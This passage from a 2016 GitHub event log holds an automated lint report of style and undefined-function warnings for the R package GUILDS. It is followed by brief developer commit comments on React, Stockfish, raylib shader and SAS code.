J)\n^~\n```\n[R/expected.R:7:7:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/expected.R#L7) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if(end > length(A)) {\n      ^\n```\n[R/expected.R:8:1:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/expected.R#L8) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tfor (m in seq_along(M$guildX)) {\n^~\n```\n[R/expected.R:9:1:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/expected.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\tmeanx[m] <- meanx[m] + M$guildX[m]\n^~~\n```\n[R/expected.R:10:1:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/expected.R#L10) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/expected.R:11:1:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/expected.R#L11) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tfor (m in seq_along(M$guildY)) {\n^~\n```\n[R/expected.R:11:1:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/expected.R#L11) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tM <- draw_local_cond(theta, alpha_x, alpha_y, Jx, Jy)\n^~\n```\n[R/expected.R:12:1:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/expected.R#L12) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\tmeany[m] <- meany[m] + M$guildY[m]\n^~~\n```\n[R/expected.R:12:1:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/expected.R#L12) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tfor (m in seq_along(M$guildX)) {\n^~\n```\n[R/expected.R:13:1:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/expected.R#L13) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/expected.R:13:1:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/expected.R#L13) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\tmeanx[m] <- meanx[m] + M$guildX[m]\n^~~\n```\n[R/expected.R:14:1:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/expected.R#L14) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/expected.R:15:1:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/expected.R#L15) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tfor (m in seq_along(M$guildY)) {\n^~\n```\n[R/expected.R:16:1:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/expected.R#L16) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\tmeany[m] <- meany[m] + M$guildY[m]\n^~~\n```\n[R/expected.R:17:1:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/expected.R#L17) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/expected.R:38:10:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/expected.R#L38) *warning:* **no visible global function definition for ‘pm_sad’**\n```r\n​  aux <- pm_sad(theta, I, J)\n         ^~~~~~\n```\n[R/expected.R:39:10:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/expected.R#L39) *warning:* **no visible global function definition for ‘sort_aux’**\n```r\n​  sad <- sort_aux(aux)\n         ^~~~~~~~\n```\n[R/expected.R:43:1:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/expected.R#L43) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​expected.SAD.Guilds <- function(theta, alpha_x, alpha_y,\n^~~~~~~~~~~~~~~~~~~\n```\n[R/expected.R:49:8:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/expected.R#L49) *warning:* **no visible global function definition for ‘draw_local’**\n```r\n​\t\tM <- draw_local(theta, alpha_x, alpha_y, J)\n       ^~~~~~~~~~\n```\n[R/expected.R:49:19:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/expected.R#L49) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tM <- draw_local(theta, alpha_x, alpha_y, J)\n                 ~^~~\n```\n[R/expected.R:50:21:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/expected.R#L50) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\tfor (m in seq_along(M$guildX)) {\n                    ^\n```\n[R/expected.R:50:39:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/expected.R#L50) *style:* **Variable and function names should be all lowercase.**\n```r\n​\t\tfor (m in seq_along(M$guildX)) {\n                                      ^~~~~~\n```\n[R/expected.R:51:34:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/expected.R#L51) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\tmeanx[m] <- meanx[m] + M$guildX[m]\n                                ~^~~\n```\n[R/expected.R:51:50:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/expected.R#L51) *style:* **Variable and function names should be all lowercase.**\n```r\n​\t\t\tmeanx[m] <- meanx[m] + M$guildX[m]\n                                                 ^~~~~~\n```\n[R/expected.R:53:21:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/expected.R#L53) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\tfor (m in seq_along(M$guildY)) {\n                    ^\n```\n[R/expected.R:53:39:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/expected.R#L53) *style:* **Variable and function names should be all lowercase.**\n```r\n​\t\tfor (m in seq_along(M$guildY)) {\n                                      ^~~~~~\n```\n[R/expected.R:54:34:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/expected.R#L54) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\tmeany[m] <- meany[m] + M$guildY[m]\n                                ~^~~\n```\n[R/expected.R:54:50:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/expected.R#L54) *style:* **Variable and function names should be all lowercase.**\n```r\n​\t\t\tmeany[m] <- meany[m] + M$guildY[m]\n                                                 ^~~~~~\n```\n[R/expected.R:60:9:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/expected.R#L60) *warning:* **no visible global function definition for ‘sort_aux’**\n```r\n​  gx <- sort_aux(meanx)\n        ^~~~~~~~\n```\n[R/expected.R:61:9:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/expected.R#L61) *warning:* **no visible global function definition for ‘sort_aux’**\n```r\n​  gy <- sort_aux(meany)\n        ^~~~~~~~\n```\n[R/expected.R:62:1:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/expected.R#L62) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/expected.R:67:1:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/expected.R#L67) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​expected.SAD.Guilds.Conditional <- function(theta,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/expected.R:67:1:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/expected.R#L67) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​expected.SAD.Guilds.Conditional <- function(theta,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/expected.R:73:18:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/expected.R#L73) *style:* **Commas should always have a space after.**\n```r\n​  meanx <- rep(0,Jx)\n                 ^\n```\n[R/expected.R:74:18:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/expected.R#L74) *style:* **Commas should always have a space after.**\n```r\n​  meany <- rep(0,Jy)\n                 ^\n```\n[R/expected.R:77:8:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/expected.R#L77) *warning:* **no visible global function definition for ‘draw_local_cond’**\n```r\n​\t\tM <- draw_local_cond(theta, alpha_x, alpha_y, Jx, Jy)\n       ^~~~~~~~~~~~~~~\n```\n[R/expected.R:77:19:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/expected.R#L77) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tM <- draw_local_cond(theta, alpha_x, alpha_y, Jx, Jy)\n                 ~^~~\n```\n[R/expected.R:78:21:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/expected.R#L78) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\tfor (m in seq_along(M$guildX)) {\n                    ^\n```\n[R/expected.R:78:39:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/expected.R#L78) *style:* **Variable and function names should be all lowercase.**\n```r\n​\t\tfor (m in seq_along(M$guildX)) {\n                                      ^~~~~~\n```\n[R/expected.R:79:34:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/expected.R#L79) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\tmeanx[m] <- meanx[m] + M$guildX[m]\n                                ~^~~\n```\n[R/expected.R:79:50:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/expected.R#L79) *style:* **Variable and function names should be all lowercase.**\n```r\n​\t\t\tmeanx[m] <- meanx[m] + M$guildX[m]\n                                                 ^~~~~~\n```\n[R/expected.R:81:21:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/expected.R#L81) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\tfor (m in seq_along(M$guildY)) {\n                    ^\n```\n[R/expected.R:81:39:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/expected.R#L81) *style:* **Variable and function names should be all lowercase.**\n```r\n​\t\tfor (m in seq_along(M$guildY)) {\n                                      ^~~~~~\n```\n[R/expected.R:82:34:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/expected.R#L82) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\tmeany[m] <- meany[m] + M$guildY[m]\n                                ~^~~\n```\n[R/expected.R:82:50:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/expected.R#L82) *style:* **Variable and function names should be all lowercase.**\n```r\n​\t\t\tmeany[m] <- meany[m] + M$guildY[m]\n                                                 ^~~~~~\n```\n[R/expected.R:88:9:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/expected.R#L88) *warning:* **no visible global function definition for ‘sort_aux’**\n```r\n​  gx <- sort_aux(meanx)\n        ^~~~~~~~\n```\n[R/expected.R:89:9:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/expected.R#L89) *warning:* **no visible global function definition for ‘sort_aux’**\n```r\n​  gy <- sort_aux(meany)\n        ^~~~~~~~\n```\n[R/expected.R:90:1:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/expected.R#L90) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/generateData.R:2:5:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/generateData.R#L2) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(theta < 1) {\n    ^\n```\n[R/generateData.R:6:5:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/generateData.R#L6) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(alpha_x < 0) {\n    ^\n```\n[R/generateData.R:10:5:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/generateData.R#L10) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(alpha_y < 0) {\n    ^\n```\n[R/generateData.R:14:5:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/generateData.R#L14) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(alpha_x > 1) {\n    ^\n```\n[R/generateData.R:18:5:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/generateData.R#L18) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(alpha_y > 1) {\n    ^\n```\n[R/generateData.R:22:1:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/generateData.R#L22) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/generateData.R:23:5:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/generateData.R#L23) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(J < 0) {\n    ^\n```\n[R/generateData.R:28:3:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/generateData.R#L28) *warning:* **local variable ‘SADX’ assigned but may not be used**\n```r\n​  SADX <- c()\n  ^~~~\n```\n[R/generateData.R:29:3:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/generateData.R#L29) *warning:* **local variable ‘SADY’ assigned but may not be used**\n```r\n​  SADY <- c()\n  ^~~~\n```\n[R/generateData.R:36:27:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/generateData.R#L36) *style:* **Put spaces around all infix operators.**\n```r\n​  I_X <- alpha_x * nx * (J-1) / (1 - alpha_x * nx - alpha_y * ny) \n                         ~^~\n```\n[R/generateData.R:36:66:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/generateData.R#L36) *style:* **Trailing whitespace is superfluous.**\n```r\n​  I_X <- alpha_x * nx * (J-1) / (1 - alpha_x * nx - alpha_y * ny) \n                                                                 ^\n```\n[R/generateData.R:37:27:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/generateData.R#L37) *style:* **Put spaces around all infix operators.**\n```r\n​  I_Y <- alpha_y * ny * (J-1) / (1 - alpha_x * nx - alpha_y * ny)\n                         ~^~\n```\n[R/generateData.R:40:3:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/generateData.R#L40) *style:* **Variable and function names should be all lowercase.**\n```r\n​  allN <- 0:J\n  ^~~~\n```\n[R/generateData.R:41:5:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/generateData.R#L41) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(is.infinite(I_X) && is.infinite(I_Y)) {\n    ^\n```\n[R/generateData.R:42:18:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/generateData.R#L42) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​     probs <- exp( lgamma(J+1) - \n                 ^\n```\n[R/generateData.R:42:28:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/generateData.R#L42) *style:* **Put spaces around all infix operators.**\n```r\n​     probs <- exp( lgamma(J+1) - \n                          ~^~\n```\n[R/generateData.R:42:33:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/generateData.R#L42) *style:* **Trailing whitespace is superfluous.**\n```r\n​     probs <- exp( lgamma(J+1) - \n                                ^\n```\n[R/generateData.R:43:26:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/generateData.R#L43) *style:* **Variable and function names should be all lowercase.**\n```r\n​                 (lgamma(allN + 1) + \n                         ^~~~\n```\n[R/generateData.R:43:37:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/generateData.R#L43) *style:* **Trailing whitespace is superfluous.**\n```r\n​                 (lgamma(allN + 1) + \n                                    ^\n```\n[R/generateData.R:44:30:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/generateData.R#L44) *style:* **Variable and function names should be all lowercase.**\n```r\n​                  lgamma(J - allN + 1)) + \n                             ^~~~\n```\n[R/generateData.R:44:42:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/generateData.R#L44) *style:* **Trailing whitespace is superfluous.**\n```r\n​                  lgamma(J - allN + 1)) + \n                                         ^\n```\n[R/generateData.R:45:19:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/generateData.R#L45) *style:* **Variable and function names should be all lowercase.**\n```r\n​                  allN * log(nx) + \n                  ^~~~\n```\n[R/generateData.R:45:35:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/generateData.R#L45) *style:* **Trailing whitespace is superfluous.**\n```r\n​                  allN * log(nx) + \n                                  ^\n```\n[R/generateData.R:46:20:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/generateData.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​                 (J-allN) * log(ny))\n                  ~^~\n```\n[R/generateData.R:46:21:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/generateData.R#L46) *style:* **Variable and function names should be all lowercase.**\n```r\n​                 (J-allN) * log(ny))\n                    ^~~~\n```\n[R/generateData.R:49:14:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/generateData.R#L49) *warning:* **no visible global function definition for ‘polyaeggenberger’**\n```r\n​    probs <- polyaeggenberger(I_X, I_Y, J, allN) \n             ^~~~~~~~~~~~~~~~\n```\n[R/generateData.R:49:44:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/generateData.R#L49) *style:* **Variable and function names should be all lowercase.**\n```r\n​    probs <- polyaeggenberger(I_X, I_Y, J, allN) \n                                           ^~~~\n```\n[R/generateData.R:49:49:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/generateData.R#L49) *style:* **Trailing whitespace is superfluous.**\n```r\n​    probs <- polyaeggenberger(I_X, I_Y, J, allN) \n                                                ^\n```\n[R/generateData.R:55:11:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/generateData.R#L55) *warning:* **no visible global function definition for ‘generate.ZSM’**\n```r\n​  sadx <- generate.ZSM(theta, I_X, NX)\n          ^~~~~~~~~~~~\n```\n[R/generateData.R:56:11:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/generateData.R#L56) *warning:* **no visible global function definition for ‘generate.ZSM’**\n```r\n​  sady <- generate.ZSM(theta, I_Y, NY)\n          ^~~~~~~~~~~~\n```\n[R/generateData.R:58:17:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/generateData.R#L58) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​  output <- list( guildX = sadx, guildY = sady)\n                ^\n```\n[R/generateData.R:59:1:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/generateData.R#L59) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/generateData.R:64:38:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/generateData.R#L64) *style:* **Commas should always have a space after.**\n```r\n​polyaeggenberger <- function(theta_x,theta_y,J,N) {\n                                     ^\n```\n[R/generateData.R:64:46:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/generateData.R#L64) *style:* **Commas should always have a space after.**\n```r\n​polyaeggenberger <- function(theta_x,theta_y,J,N) {\n                                             ^\n```\n[R/generateData.R:64:48:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/generateData.R#L64) *style:* **Commas should always have a space after.**\n```r\n​polyaeggenberger <- function(theta_x,theta_y,J,N) {\n                                               ^\n```\n[R/generateData.R:66:39:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/generateData.R#L66) *style:* **Trailing whitespace is superfluous.**\n```r\n​  b <- lgamma(theta_x + theta_y + J) - \n                                      ^\n```\n[R/generateData.R:68:1:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/generateData.R#L68) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/generateData.R:71:32:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/generateData.R#L71) *style:* **Put spaces around all infix operators.**\n```r\n​  d <- lgamma(N + 1) + lgamma(J-N+1)\n                              ~^~\n```\n[R/generateData.R:71:34:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/generateData.R#L71) *style:* **Put spaces around all infix operators.**\n```r\n​  d <- lgamma(N + 1) + lgamma(J-N+1)\n                                ~^~\n```\n[R/generateData.R:72:1:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/generateData.R#L72) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/generateData.R:76:1:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/generateData.R#L76) *style:* **Variable and function names should be all lowercase.**\n```r\n​localComm <- function(alpha_x, alpha_y, Jx, Jy, px) {\n^~~~~~~~~\n```\n[R/generateData.R:82:27:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/generateData.R#L82) *style:* **Put spaces around all infix operators.**\n```r\n​  I_X <- alpha_x * nx * (J-1) / (1 - alpha_x * nx - alpha_y * ny) \n                         ~^~\n```\n[R/generateData.R:82:66:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/generateData.R#L82) *style:* **Trailing whitespace is superfluous.**\n```r\n​  I_X <- alpha_x * nx * (J-1) / (1 - alpha_x * nx - alpha_y * ny) \n                                                                 ^\n```\n[R/generateData.R:83:27:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/generateData.R#L83) *style:* **Put spaces around all infix operators.**\n```r\n​  I_Y <- alpha_y * ny * (J-1) / (1 - alpha_x * nx - alpha_y * ny)\n                         ~^~\n```\n[R/generateData.R:85:4:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/generateData.R#L85) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​ if(is.infinite(I_X) && is.infinite(I_Y)) {\n   ^\n```\n[R/generateData.R:86:29:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/generateData.R#L86) *style:* **Put spaces around all infix operators.**\n```r\n​     output <- exp( lgamma(J+1) - \n                           ~^~\n```\n[R/generateData.R:86:34:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/generateData.R#L86) *style:* **Trailing whitespace is superfluous.**\n```r\n​     output <- exp( lgamma(J+1) - \n                                 ^\n```\n[R/generateData.R:87:36:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/generateData.R#L87) *style:* **Trailing whitespace is superfluous.**\n```r\n​                  (lgamma(Jx + 1) + \n                                   ^\n```\n[R/generateData.R:89:35:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/generateData.R#L89) *style:* **Trailing whitespace is superfluous.**\n```r\n​                    Jx * log(nx) + \n                                  ^\n```\n[R/generateData.R:90:23:](https://github.com/thijsjanzen/GUILDS/blob/331c5e5cffde4414da0f86fd606d1888a0818221/R/generateData.R#L90) *style:* **Put spaces around all infix operators.**\n```r\n​                    (J-Jx) * log(ny))\n                     ~^~\n```\n"}},"created_at":"2016-09-22T21:35:32Z"}
{"id":"4605252320","type":"CommitCommentEvent","actor":{"login":"nkabardin"},"repo":{"name":"aspanoz/TCT-web"},"payload":{"comment":{"id":19137338,"position":12,"line":12,"path":"src/components/App.js","commit_id":"05a035c307bbd20e6af09d03b02f99a76eb9e2cb","created_at":"2016-09-22T21:35:48Z","updated_at":"2016-09-22T21:35:48Z","body":"`export default class Hello extends Component {}`"}},"created_at":"2016-09-22T21:35:48Z"}
{"id":"4605254441","type":"CommitCommentEvent","actor":{"login":"nkabardin"},"repo":{"name":"aspanoz/TCT-web"},"payload":{"comment":{"id":19137346,"position":12,"line":12,"path":"src/components/App.js","commit_id":"05a035c307bbd20e6af09d03b02f99a76eb9e2cb","created_at":"2016-09-22T21:36:15Z","updated_at":"2016-09-22T21:36:15Z","body":"may be it's opinionated, but it's just for inspiration, may be you'll like it"}},"created_at":"2016-09-22T21:36:15Z"}
{"id":"4605254479","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":19137347,"position":null,"line":null,"path":null,"commit_id":"9df3d60efa063adf509705ab5246fed94d37b780","created_at":"2016-09-22T21:36:16Z","updated_at":"2016-09-22T21:36:16Z","body":"In fact the bench doesn't change at all if we add the line `if (nextVictim == KING) dcCandidates[stm] = 0;` on line 1040 (even very long bench at depth 22), because the change has never any effect on `dcAttackers` in line 1049.\r\n\r\nIndeed, for each possible discovered check, when `m`is a king move, we have the following cases:\r\n• if the king moves in the line of the sniper-blocker-king, then the discovered check is still there\r\n• if the king moves away from the line of the sniper-blocker-king, then the sniper can not be in the attackers variable, so `dcAttackers`doesn't change in line 1049."}},"created_at":"2016-09-22T21:36:16Z"}
{"id":"4605255706","type":"CommitCommentEvent","actor":{"login":"victorfisac"},"repo":{"name":"raysan5/raylib"},"payload":{"comment":{"id":19137352,"position":null,"line":null,"path":null,"commit_id":"478d3cbb79caa27351cf9e9a5ff9925ca658a89c","created_at":"2016-09-22T21:36:30Z","updated_at":"2016-09-22T21:36:30Z","body":"The normal map implementation is not correct (currently multiplying the vertex normal):\r\n\r\n`if (useNormal == 1)\r\n{\r\n     n *= texture(texture1, fragTexCoord).rgb;\r\n     n = normalize(n);\r\n}`\r\n\r\nI think to use _Tangent Space Normal Mapping_, all vectors needs to be converted to _Tangent Space_ (not sure what it means) and then, replace the normal vector used to calculate attenuation (n) by the color fetching result of the normal map texture:\r\n\r\n`if (useNormal == 1) n = texture(texture1, fragTexCoord).rgb;`\r\n\r\nIt should be equal to keep lights vectors as default (_World Space_) and use _Object Space Normal Mapping_. But I am not really sure about the real way to handle those \"space issues\"..."}},"created_at":"2016-09-22T21:36:30Z"}
{"id":"4605257582","type":"CommitCommentEvent","actor":{"login":"ptatian"},"repo":{"name":"NeighborhoodInfoDC/HUD"},"payload":{"comment":{"id":19137358,"position":null,"line":null,"path":null,"commit_id":"a489090cdf5d02002a519642564f28d9b120d412","created_at":"2016-09-22T21:36:55Z","updated_at":"2016-09-22T21:36:55Z","body":"Thanks, Katya. This looks like you are on the right track. The %File_info() macro prints basic summary information about the data set (proc contents, proc means, proc freq) to the output. If there are categorical variables that would be useful to see frequencies of in the output, those variables should be listed after the freqvars= parameter. "}},"created_at":"2016-09-22T21:36:55Z"}
{"id":"4605262181","type":"CommitCommentEvent","actor":{"login":"nkabardin"},"repo":{"name":"aspanoz/TCT-web"},"payload":{"comment":{"id":19137369,"position":4,"line":4,"path":"src/assets/css/styles.sss","commit_id":"05a035c307bbd20e6af09d03b02f99a76eb9e2cb","created_at":"2016-09-22T21:37:51Z","updated_at":"2016-09-22T21:37:51Z","body":"hahaha amazing names: `floralwhite` and `tomato`. True artist! 😉 "}},"created_at":"2016-09-22T21:37:51Z"}
